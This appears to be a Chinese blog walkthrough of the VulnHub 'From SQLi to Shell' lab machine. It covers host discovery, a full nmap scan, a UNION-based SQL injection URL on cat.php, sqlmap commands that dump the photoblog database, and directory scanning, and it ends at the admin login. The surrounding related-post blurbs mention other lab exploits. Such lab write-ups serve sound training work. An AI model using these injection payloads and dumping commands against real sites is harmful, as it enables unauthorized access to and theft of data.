Debian6靶场

fasewer

于 2024-07-28 17:12:48 发布

阅读量414

点赞数 2

文章标签：网络安全

本文链接：https://blog.csdn.net/a666666688/article/details/140753151

版权

靶机下载

https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso

主机发现

arp-scan -l

端口扫描

nmap -A -sV -p- 192.168.48.138

访问80端口

http://192.168.48.138：80

F12查看页面源码

存在sql注入并发现了文件上传路径

访问文件上传路径

http://192.168.48.138/admin/uploads/

访问admin

http://192.168.48.138/admin/login.php

sql注入测试

http://192.168.48.138/cat.php?id=-2%20union%20select%201,group_concat(table_name)%20,3,4%20from%20information_schema.tables%20where%20table_schema=database()--+

sqlmap

跑数据库

sqlmap -u "http://192.168.48.138/cat.php?id=1" --batch -dbs

爆表和字段信息

sqlmap -u "http://192.168.48.138/cat.php?id=1" --batch -D photoblog -dump-all

获得密码登录成功

目录扫描

python3 dirsearch.py -u http://192.168.48.138

访问http://192.168.48.138/admin/

http://192.168.48.138/admin/login.php

访问css/

http://192.168.48.138/css/

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

fasewer

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
Debian6靶场

存在sql注入并发现了文件上传路径。
复制链接

扫一扫

Debian6 Mysql5.6 deb安装包

01-28

Debian6 Mysql5.6 deb安装包及相关依赖,亲测可用（libaio,libaiodev,debian-keyring）安装方式： sudo dpkg -i mysql-5.6.10-debian6.0-x86_64.deb sudo /opt/mysql/server-5.6/support-files/mysql.server start ...

全新DebianDebian

08-12

Debian，全称为“Debian GNU/Linux”，是一个自由开源的操作系统，主要基于Linux内核，由全球各地的志愿者开发者共同维护和开发。它的名字来源于其创始人Ian Murdock的名字和他当时的女友Debra的组合。Debian的核心...

参与评论您还未登录，请先登录后发表或查看评论

Linux Debian12使用podman安装xss-labs靶场环境

星如雨落

06-13

294

Linux Debian12使用podman安装xss-labs靶场环境

Linux Debian11使用podman安装sqli-labs靶场环境

星如雨落

03-26

459

Linux Debian11使用podman安装sqli-labs靶场环境

Linux Debian12使用podman安装upload-labs靶场环境

星如雨落

12-26

567

PHP语言编写，持续收集渗透测试和CTF中针对文件上传漏洞的靶场，总共21关，每一关都包含着不同的上传绕过方式。

Linux Debian12使用podman安装pikachu靶场环境

星如雨落

06-13

362

Linux Debian12使用podman安装pikachu靶场环境

红日靶场四

qq_50696533的博客

12-29

3448

红日靶场4大家好红日安全红队靶场（四）已经出来，本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞，希望大家多多利用。靶场学习路径，可参考 struts2 漏洞利用 tomcat 漏洞利用 phpmyadmin getshell docker逃逸 ms14-068 ssh密钥利用流量转发历史命令信息泄露域渗透。利用永恒之蓝获得win7 mimikatz抓取密码利用Kerberos 域用户提权漏洞获得域

DC-6靶场

2301_76690905的博客

12-19

1047

不过我在这里遇到了一个小问题，找不到rockyou.txt，顺着路径追下去发现我/usr/share/wordlists下的是rockyou.txt.gz而不是.txt，这种情况解压就行了，在文件里解压会提示没有权限，所以去到命令行用root权限在该路径下解压。下载后解压会有一个DC-3.ova文件，直接在vm虚拟机点击左上角打开-->文件-->选中这个.ova文件就能创建靶场，kali和靶机都调整至NAT模式，即可开始渗透。虽然看不到自己打的命令，但是命令的输出会出现在后面，正常回车就行。

vulnhub DC:1靶场

weixin_46420165的博客

12-28

314

据某个帖子说是因为现在有一个在线的MD5数据库，可以查到很多MD5码的原文，因此Drupal 7的开发者认为不能再继续采用这种极不安全的方法了，因此Drupal 7采用了新型的Hash加密方法来确保密码安全。要成功完成这一挑战，您需要 Linux 技能、熟悉 Linux 命令行以及基本渗透测试工具的经验，例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。网络是为 DHCP 配置的。它旨在对初学者来说是一个挑战，但它的难易程度取决于您的技能和知识以及您的学习能力。

DC4靶场

m0_62438849的博客

03-09

961

例如，网站可能是由静态文件组成，不需要后端数据库或复杂的CMS来管理内容。每个有效负载集都可以使用各种有效负载类型，并可以以不同的方式自定义每种负载类型。Payload type(负载类型)：较为常用的有Simple list(简单列表)、Runtime file(运行文件)等。所谓“无法登录”，指的是仅是这个用户无法使用bash或者其他shell来登录系统而已，并不是说这个账号就无法使用系统资源。系统账号的shell使用/sbin/nologin，此时无法登录系统，即时给了密码也不行。

DC-8靶场

2301_76690905的博客

12-20

1332

下载后解压会有一个DC-8.ova文件。在网页里到处点击，找到了可以执行php代码的地方，可以执行Php代码的地方在，联系我们-->WEBFROM-->Form settings的地方，选择php code。-p, --path [EDB-ID] 显示漏洞利用的完整路径（如果可能，还将路径复制到剪贴板），后面跟漏洞ID号。使用“-v”（详细）来尝试更多的组合。

debian package

06-06

6. **上传**：将签名后的包上传到Debian的APT仓库或个人仓库。理解并熟练使用Debian Package工具对于Debian系统的管理、软件开发和打包工作至关重要。这不仅可以确保软件在Debian环境中的无缝集成，还能提高用户的...

debian6配置mysql允许远程连接的方法(图)

09-10

在Debian 6这样的Linux操作系统上配置MySQL允许远程连接，是很多系统管理员和开发者必须掌握的技能。本篇文章将详细讲解如何在Debian 6上设置MySQL远程访问权限。首先，确保您已经安装了MySQL服务器。在Debian 6中...

debian安装qtpyvcp

05-17

根据提供的文件信息，本文将详细解析如何在Debian 12上安装QtPyVCP的过程。这主要包括几个关键步骤：首先是Debian 12虚拟机的安装与配置；其次为安装必要的工具，如LinuxCNC 2.9、Qt 5.14.2等；最后是安装QtPyVCP...

Nessus-8.2.3-debian6_amd64

03-16

2019年2月17日更新的Nessus - 8.2.3版本，官网最新版本下载，适用于debian、Kali系统

Debian如何限制sudo权限

04-01

适合人群：Linux/Debian的初学者能学到什么：设置普通用户执行sudo的权限，使其只能执行指定的命令。用户使用su命令切换root。但是权限太大，而且root密码有泄露风险。那么能否在不泄露root密码的前提下对权限进行...

debian rootfs 文件系统